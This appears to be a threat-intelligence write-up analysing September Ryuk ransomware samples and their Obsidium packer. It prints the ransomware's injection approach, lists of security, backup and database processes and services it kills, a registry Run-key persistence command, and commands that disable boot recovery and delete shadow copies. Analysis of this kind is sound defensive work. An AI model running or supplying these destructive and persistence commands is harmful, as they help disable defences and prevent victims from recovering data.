September was a very busy month for news and vulnerability. With each new vulnerability allowing rights to be pivoted and raised quickly in an infrastructure, Ruyk quickly exploits it to the full to quickly make the event profitable.

By various response responses to incidents and articles dedicated to the news on TTPs used, several strains were found in the September month:

New builds in the old templates

This begins by load all the sensitive strings this can be used for the rest of the process.

```asm 0x3500557a xor eax, eax 0x3500557c mov dword [var_3ch], eax 0x3500557f mov dword [var_38h], eax 0x35005582 mov word [var_34h], ax 0x35005586 push 0xa ; 10 0x35005588 lea ecx, [var_3ch] 0x3500558b push ecx 0x3500558c mov edx, dword [] ; 0x3501c000 0x35005592 push edx 0x35005593 call init_process 0x35005598 add esp, 0xc 0x3500559b lea eax, [var_3ch] 0x3500559e mov dword [var_ch], eax 0x350055a1 mov ecx, dword [var_ch] 0x350055a4 add ecx, 1 0x350055a7 mov dword [var_40h], ecx ```

This use all the strings as reference for call the API functions and strings by calls.

Firstly, this enumerate processes by "CreateToolhelp32Snapshot" for parse the running process and try to open the following process with "OpenProcess". If works write the payload on process by "WriteProcessMemory" call and create another thread with "CreateRemoteThread" call.

``` // target only x86 process explorer.exe lsaas.exe lan.exe csrss.exe // Fake typo Ncsrss.exe ```

This enumerate processes a second time by "CreateToolhelp32Snapshot" for check the process and kill all the matchs. Also check the services running on the machine and stop them.

``` // list of process to kill virtual vmcomp vmwp veeam backup Backup xchange sql dbeng sofos calc ekrn zoolz encsvc excel firefoxconfig infopath msaccess mspub mydesktop ocautoupds ocomm ocssd onenote oracle outlook powerpnt sqbcoreservice steam synctime tbirdconfig thebat thunderbird visio word xfssvccon tmlisten pccntmon cntaosmgr ntrtscan mbamtray ``` ``` // list of services to kill vmcomp vmwp veeam Back xchange ackup acronis sql Enterprise Sophos Veeam AcrSch Antivirus Antivirus bedbg DCAgent EPSecurity EPUpdate Eraser EsgShKernel FA_Scheduler IISAdmin IMAP4 MBAM Endpoint Afee McShield task mfemms mfevtp mms MsDts Exchange ntrt PDVF POP3 Report RESvc sacsvr SAVAdmin SamS SDRSVC SepMaster Monitor Smcinst SmcService SMTP SNAC swi_ CCSF TrueKey tmlisten UI0Detect W3S WRSVC NetMsmq ekrn EhttpSrv ESHASRV AVP klnagent wbengine KAVF mfefire ```

This execute a command for add an Run key for the persistence, if already exist, this delete it and rewrite it.

```do cmd.exe /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" /v "EV" /t REG_SZ /d [$Path Exe] cmd.exe /C REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" /v "EV" /f ```

Some samples have the capacity to use "Wake On Lan" for spreading on the network infrastructure. This write a copy of himself and execute it in creating a new thread in pushing “8 LAN” as argument. Each one have a sleep call for wait time before encryption.

This parse the disks with "GetDriveTypeA" calls for get local and network drives. This check some strings for check if the disks are valid and ignore some extensions to encrypt.

``` // List of strings checked on the path to parsing process Ahnlab Chrome Mozilla Windows $Recycle.bin ``` ``` // List of file extensions to ignore on the encryption process .dll .hrmlog .exe .ini .lnk .bootmgr .boot ```

This disable the windows automatic repair option on the boot and delete the VSS saves for avoid to recovery the data :

``` cmd.exe /c "bcdedit /set {default} recoveryenabled No & bcdedit /set {default}" cmd.exe /c "bootstatuspolicy ignoreallfailures" cmd.exe /c "vssadmin.exe Delete Shadows /all /quiet" cmd.exe /c "WMIC.exe shadowcopy delete" ```

In searching on the archives, we can note that the same exact behavior that analysed on March 2020 by Fortinet. This allows to deduce that the group have build in emergency somes payloads for exploit quickly the vulnerability.

Hash Extension Sig

Reference :

Ryuk Revisited - Analysis of Recent Ryuk Attack

Some samples on lastest pool of September are packed with another packer "Obsidium" which use lot Xor and permutation operations for load this own dll on a new thread in decoding finally the encrypted data with the code inside the obsidium dll.

```cpp uint32_t uVar1; uint32_t uVar2; int32_t iVar3; int32_t iVar4; int32_t iVar5; uint32_t uVar6; uint8_t *puVar7; uint32_t uVar8; int32_t var_10h; int32_t var_ch; int32_t var_8h; int32_t var_4h; var_10h = param_1 ^ 0x117584c9; var_ch = param_1 ^ 0xcc213749; *(int32_t *)0xf04589ba = *(int32_t *)0xf04589ba - (int32_t)&stack0xfffffffc; var_8h = param_1 ^ 0x85a228df; var_4h = param_1 ^ 0x257bd6b0; // PushCode func_0x3502c145(0x3502c5f3, 0x5f81, &var_10h); puVar7 = (uint8_t *)0x3502c5f3; uVar1 = 0xe3e; uVar6 = 1; uVar8 = 0; do { while ((4 < uVar1 && (uVar8 < 0x80000000))) { iVar3 = uVar6 + *puVar7; iVar4 = iVar3 + (uint32_t)puVar7[1]; iVar5 = iVar4 + (uint32_t)puVar7[2]; uVar6 = iVar5 + (uint32_t)puVar7[3]; uVar1 = uVar1 - 4; puVar7 = puVar7 + 4; uVar8 = uVar8 + iVar3 + iVar4 + iVar5 + uVar6; } uVar2 = uVar6 + *puVar7; uVar6 = uVar2 % 0xfff1; uVar1 = uVar1 - 1; puVar7 = puVar7 + 1; uVar8 = (uVar8 + uVar2) % 0xfff1; } while (uVar1 != 0); return; ```

On the memory trace, we can note the strings in memory show the reference to the packer used for hide the RYUK ransomware.

As said before, the payload write a copy of himself and execute by a new thread with "8 LAN" argument, the last samples have a common pattern :

``` // Example of dropped files on the disk %temp%\PaRyHBUIXlan.exe %temp%\PaRyHBUIXlan.exe %temp%\nXsTetgJilan.exe // Pattern -> %temp%\\[a-zA-Z]{9}lan.exe ```

This use as used icacls for change the rights attribution and parse the disks, this give the current process graph (Single + WOL).

The last samples have the same algorithms for decrypt the code to execute but have some deleted parts that the code for the "LAN spreading" functionality (give an offset on comparative analysis).

Hash Extension Sig

For resume, RYUK group haven't really change the ransomware implant but have just take the opportunity to edit a few payloads to make the most of the infection returns before the majority of security managers fix the Zerologon vulnerability of theirs informations systems.

Additionnal ressources :